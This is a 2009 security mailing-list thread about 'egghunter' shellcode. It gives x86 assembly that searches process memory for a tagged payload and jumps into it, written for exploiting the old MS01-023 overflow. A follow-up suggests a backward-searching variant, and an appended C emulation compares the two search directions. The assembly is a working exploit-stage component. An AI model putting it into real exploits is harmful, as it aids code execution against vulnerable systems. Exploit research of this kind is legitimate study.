Dailydave mailing list archives
Re: Merry Xmas & Happy "Search Memory for you Shellcode"...
From: "Nelson Brito" <nbrito () sekure org>
Date: Wed, 23 Dec 2009 12:36:33 -0200
What if?

    inc_page:
        and edx, 0FFFFF000h     ; align edx down to the start of its page
    inc_byte:
        dec edx                 ; decrement our pointer by one

Has anyone tested this yet???

/*
 * $Id: .siganture,v 1.3 2009-12-11 09:22:54-02 nbrito Exp $
 *
 * Author: Nelson Brito <nbrito [at] sekure [dot] org>
 * Copyright(c) 2004-2009 Nelson Brito. All rights reserved worldwide.
 * http://fnstenv.blogspot.com
 */
-----Original Message-----
From: Nelson Brito [mailto:nbrito () sekure org]
Sent: Wednesday, December 23, 2009 12:16 PM
To: 'dailydave () lists immunityinc com'
Subject: Merry Xmas & Happy "Search Memory for you Shellcode"...

Hey, fellows.

I got some spare time to work with a well-known technique called "egghunt", based on skape's excellent article "Safely Searching Process Virtual Address Space" (http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf).

But while trying to perform this technique on a really old vulnerability (MS01-023) the egghunt doesn't work as well as I was expecting.

The code:

    win32_syscall_forward_01 PROC
    start:
        xor edx, edx            ; zeroing the edx, it is necessary to avoid BO in 'Release'
    inc_page:
        or dx, 0FFFh            ; add PAGE_SIZE-1 to edx
    inc_byte:
        inc edx                 ; increment our pointer by one
    setup_syscall:
        push edx                ; save edx on the stack
        push +02h               ; push NtAccessCheckAndAuditAlarm
        pop eax                 ; pop into eax
        int 2Eh                 ; perform the syscall (KiSystemService())
        cmp al, 05h             ; did we get 0xc0000005 (STATUS_ACCESS_VIOLATION)?
        pop edx                 ; restore edx
        je inc_page             ; yes, invalid pointer, go to the next page
    setup_badge:
        mov eax, "NBNB"         ; throw our badge in eax
    check_badge:
        mov edi, edx            ; set edi to the pointer we validated
        scasd                   ; compare the dword in edi to eax
        jnz inc_byte            ; no match? increment the pointer by one
        scasd                   ; compare the dword in edi to eax again - edi is now edx + 4
        jnz inc_byte            ; no match? increment the pointer by one
    badge_found:
        jmp edi                 ; found the badge, jump 8 bytes past it into our code
    win32_syscall_forward_01 ENDP

Well, I called this "forward" because it will try to find the code from "the place" the BO happens to the end of the STACK. Am I right?

But in this vulnerability the stager shellcode will be placed somewhere on the BOTTOM of the STACK, right?

/*
 * $Id: .siganture,v 1.3 2009-12-11 09:22:54-02 nbrito Exp $
 *
 * Author: Nelson Brito <nbrito [at] sekure [dot] org>
 * Copyright(c) 2004-2009 Nelson Brito. All rights reserved worldwide.
 * http://fnstenv.blogspot.com
 */
_______________________________________________ Dailydave mailing list Dailydave () lists immunitysec com http://lists.immunitysec.com/mailman/listinfo/dailydave
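The following C program is an added example, not code from the thread or from skape's paper: it emulates the egghunter loop over a small constructed address space so the posted forward walk (or dx,0FFFh / inc edx) can be compared with the backward walk proposed in the reply (and edx,0FFFFF000h / dec edx). The page map, the 8-page address space and the probe_ok() stand-in for the NtAccessCheckAndAuditAlarm probe are assumptions made here; in particular the stub treats the probe as faulting if any of the 8 bytes the two scasd will read lies on an unreadable page, which is a simplification of what the real syscall validates.

```c
/*
 * egghunt_sim.c: added emulation of the egghunter loop, forward and backward.
 * Not code from the original message. Address space, page map and probe are
 * constructed here and simplify the real Windows behaviour.
 */
#include <stdint.h>
#include <string.h>
#include <stdio.h>

#define PAGE_SIZE  0x1000u
#define NPAGES     8u
#define SPACE_SIZE (NPAGES * PAGE_SIZE)
#define NOT_FOUND  UINT32_MAX

/* Constructed address space: page i is readable iff mapped[i] is set. */
static unsigned char space[SPACE_SIZE];
static int mapped[NPAGES];

/* Build a scenario: bit i of mapped_mask maps page i; the 8-byte badge
 * "NBNBNBNB" (the egg twice, as the two scasd expect) is planted at egg_off. */
void setup(uint32_t mapped_mask, uint32_t egg_off) {
    memset(space, 0, sizeof space);
    for (uint32_t i = 0; i < NPAGES; i++)
        mapped[i] = (mapped_mask >> i) & 1;
    memcpy(space + egg_off, "NBNBNBNB", 8);
}

/* The dword the hunter compares against: "NBNB" as it sits in memory, so the
 * assembler's byte ordering of a string immediate does not matter here. */
uint32_t egg_value(void) {
    uint32_t v;
    memcpy(&v, "NBNB", 4);
    return v;
}

/* Assumed stand-in for the syscall probe: STATUS_ACCESS_VIOLATION if any of
 * the 8 bytes the hunter is about to read lies on an unreadable page. */
static int probe_ok(uint32_t addr) {
    if (addr > SPACE_SIZE - 8) return 0;
    return mapped[addr / PAGE_SIZE] && mapped[(addr + 7) / PAGE_SIZE];
}

static uint32_t load32(uint32_t addr) {
    uint32_t v;
    memcpy(&v, space + addr, 4);
    return v;
}

/* check_badge / badge_found: two scasd, then jmp edi (8 bytes past the egg). */
static int badge_at(uint32_t edx, uint32_t egg, uint32_t *target) {
    uint32_t edi = edx;
    if (load32(edi) != egg) return 0;   /* scasd ; jnz inc_byte */
    edi += 4;
    if (load32(edi) != egg) return 0;   /* scasd ; jnz inc_byte */
    edi += 4;
    *target = edi;                      /* jmp edi */
    return 1;
}

/* Forward walk as posted: entry falls into inc_page, so the first byte
 * examined is the start of the page after the one containing edx. */
uint32_t hunt_forward(uint32_t edx, uint32_t egg) {
    int next_page = 1;
    uint32_t target;
    for (;;) {
        if (next_page) edx |= 0xfff;                 /* or dx, 0FFFh */
        if (edx + 1 >= SPACE_SIZE) return NOT_FOUND; /* emulation: off the top */
        edx++;                                       /* inc edx */
        next_page = !probe_ok(edx);                  /* AV? je inc_page */
        if (!next_page && badge_at(edx, egg, &target)) return target;
    }
}

/* Backward walk from the reply: align down to the page, then step one lower. */
uint32_t hunt_backward(uint32_t edx, uint32_t egg) {
    int prev_page = 1;
    uint32_t target;
    for (;;) {
        if (prev_page) edx &= 0xfffff000u;           /* and edx, 0FFFFF000h */
        if (edx == 0) return NOT_FOUND;              /* emulation: off the bottom */
        edx--;                                       /* dec edx */
        prev_page = !probe_ok(edx);                  /* AV? je inc_page */
        if (!prev_page && badge_at(edx, egg, &target)) return target;
    }
}

int main(void) {
    /* Pages 1,2,3,5,6 mapped (mask 0x6E); egg planted at 0x2100 in page 2. */
    setup(0x6Eu, 0x2100);
    printf("forward  from 0x0000: 0x%08x\n", hunt_forward(0, egg_value()));      /* 0x00002108 */
    printf("backward from 0x3800: 0x%08x\n", hunt_backward(0x3800, egg_value())); /* 0x00002108 */
    printf("forward  from 0x3000: 0x%08x\n", hunt_forward(0x3000, egg_value()));  /* 0xffffffff */
    printf("backward from 0x1800: 0x%08x\n", hunt_backward(0x1800, egg_value())); /* 0xffffffff */
    return 0;
}
```

Two things the emulation makes visible. First, direction: with the egg in page 2, the forward walk finds it only when started below it and the backward walk only when started above it, which is the point raised in the original message about where the stager sits relative to the overflow. Second, under the 8-byte probe assumption, the two variants skip pages differently: the forward walk skips exactly the unreadable page, but the backward walk, on a fault caused by the last bytes of a readable page running into an unreadable one above, aligns down and decrements past the whole readable page, so an egg in the first bytes of that page is never examined (map pages 1 to 4 and 6, plant the egg at 0x4000, and hunt_backward(0x5800, ...) returns NOT_FOUND while hunt_forward(0, ...) returns 0x4008). Whether the real syscall behaves that way depends on how many bytes it validates, which this stub does not model. One more check worth making before blaming the search direction: MASM stores the first character of a multi-character immediate in the most significant byte while NASM stores it in the least, so the same `mov eax, "NBNB"` line can produce an egg whose in-memory bytes are reversed relative to the badge planted by the exploit.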
Current thread:
- Re: Merry Xmas & Happy "Search Memory for you Shellcode"... Nelson Brito (Dec 23)
- Re: Merry Xmas & Happy "Search Memory for you Shellcode"... Berend-Jan Wever (Dec 23)